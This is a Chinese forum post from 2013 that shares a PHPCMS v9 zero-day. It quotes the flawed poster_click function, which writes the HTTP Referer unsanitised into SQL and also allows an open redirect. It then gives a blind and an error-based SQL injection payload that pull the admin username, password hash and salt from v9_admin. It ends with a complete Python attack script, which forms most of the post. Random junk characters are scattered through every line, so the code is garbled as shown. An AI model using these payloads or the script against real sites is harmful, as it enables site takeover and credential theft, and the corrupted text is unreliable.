有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
6 Q1 a% t* ^' c0 p1 w! {: {, u& ~/ m: V
问题函数\phpcms\modules\poster\index.php
3 z5 t$ i* _- q D' e! x6 n% O* ~" d5 f' Z; m- q) v
public function poster_click() {
3 `) J( a- P# E# |, W4 ?$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
0 k- { n# S' H# c3 U- b$r = $this->db->get_one(array('id'=>$id));/ k& ~9 V" P' A2 g X* t
if (!is_array($r) && empty($r)) return false;; M" g# ]8 Z1 O$ N: w
$ip_area = pc_base::load_sys_class('ip_area');2 p1 ^' {& y, l" ^0 f
$ip = ip();/ Z. b7 o+ K7 ^: P
$area = $ip_area->get($ip);6 F* ~9 c9 W. f' S: X
$username = param::get_cookie('username') ? param::get_cookie('username') : '';( j5 D4 R3 b1 G! ?3 Y3 T
if($id) {6 \" R* N2 L5 D
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();3 f2 p/ r" j5 v- T, p1 x* B
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));# X6 ]+ f5 i" i" l$ Q
} D& D, V2 q! ?2 |7 m& J# Y
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
. \2 j: j6 o9 D- ^5 P" ~$ f1 O$setting = string2array($r['setting']);
/ _: B0 o* c2 A: Dif (count($setting)==1) {
, Q, g$ P" ^$ f0 L3 Z- n- F: M$url = $setting['1']['linkurl'];9 q4 ~" C8 c h. W- E$ S$ m
} else {
. J. w+ Q8 z. j9 T6 P2 k1 Y$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];/ S6 y1 c4 S( c0 j) i. }
}) Z& I8 \: q! B# o- [5 U- o
header('Location: '.$url);$ E# _( A6 B: P' h* C c
}
8 ?1 k3 C: X9 t8 E6 J4 v+ y2 b" t5 ]5 T( n. W" `- x/ o
$ I" c% b: l$ x3 y' t5 |' }/ t! J2 n9 w% k0 g/ Y
利用方式:
1 G6 k7 Y5 v8 ^/ P$ P$ E3 n. K+ \' |# z$ l& P* U
1、可以采用盲注入的手法:, D8 u% H. X0 `. L' [+ Y# x
* [( N1 ^; `& Oreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#* z/ e- f0 o8 |& d% G
; K# }: m) ~8 K8 p& a通过返回页面,正常与否一个个猜解密码字段。
4 R% T! l5 `- l% u7 F9 J7 ]' J. B* f
, C. ^( U, f" {6 `3 w6 L5 n2、代码是花开写的,随手附上了:. F4 m ]. ~- t) J3 n6 T5 C
( ? p2 o' I5 x8 A+ b# p
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
2 o6 w8 q7 G" v+ l" J1 S6 ?0 G$ y; F! R
U" e, l( k9 _0 |此方法是爆错注入手法,原理自查。
3 J' O+ b. P/ A8 [) O
- ^' I% Q0 Q2 X# }" U
% ]* ?' y. t% p+ O# \, e, R& q0 ~$ H+ o1 W
利用程序:
2 a# t7 U$ l6 `* ~$ m, j% z9 Z+ ?) D3 {& ^( c) y+ v' E, ?, X, x; L
#!/usr/bin/env python
5 e3 c" u- A' A, d" `0 ]import httplib,sys,re
# [. h6 T, S1 f' O9 {+ q' U' e6 b+ i, M9 \
def attack():+ l# Z$ z5 Z) D* t% V! Y. Q L1 d. a
print “Code by Pax.Mac Team conqu3r!”9 n* V5 v. w4 R$ @/ W6 @* G5 a3 W% A
print “Welcome to our zone!!!”5 Z- e. g4 |1 N" P
url=sys.argv[1]
& _1 O9 q Y2 d" {6 V U2 }1 Epaths=sys.argv[2]
* a" m+ d* j- K' kconn = httplib.HTTPConnection(url)' S( T' P/ o- C# j5 c. E9 K! Z/ } H
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,7 C. r0 f1 [3 E4 N m$ n, i
“Accept”: “text/plain”,
" X" `! O! g# r' I" l! l7 h“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
& D O* a/ Z8 V9 L. @) hconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)$ j: W% b$ z1 m' i' ]
r1 = conn.getresponse()
9 u, f+ [* J! L# c" {2 [$ _datas=r1.read()
" S- R2 V( |) `; j2 i! @datas=re.findall(r”Duplicate entry \’\w+’”, datas), q0 x e- \! |! D3 A
print datas[0]. d! `. K4 q2 a) m" H0 l+ W! V8 r
conn.close()
" B9 l+ q9 l$ o5 f6 Yif __name__==”__main__”:
" q3 V# A! O3 a6 Y- K! }if len(sys.argv)<3:& h6 d. d P! U X+ i% }
print “Code by Pax.Mac Team conqu3r”, F- x! }; Z* J) u! v! p
print “Usgae:”# e5 u6 t$ g2 Q p2 B; H2 q: r9 [
print “ phpcmsattack.py www.paxmac.org /”
$ K% ~; r9 g ~2 t/ A. vprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
3 I. g( ^+ d. D* c+ Vsys.exit(1)+ i- f- s7 |; F; b
attack()2 y0 K4 \' z' r% B# r
8 b5 R0 I2 s t; u( m
|
发表于 2013-1-11 21:01:00
收藏
支持
反对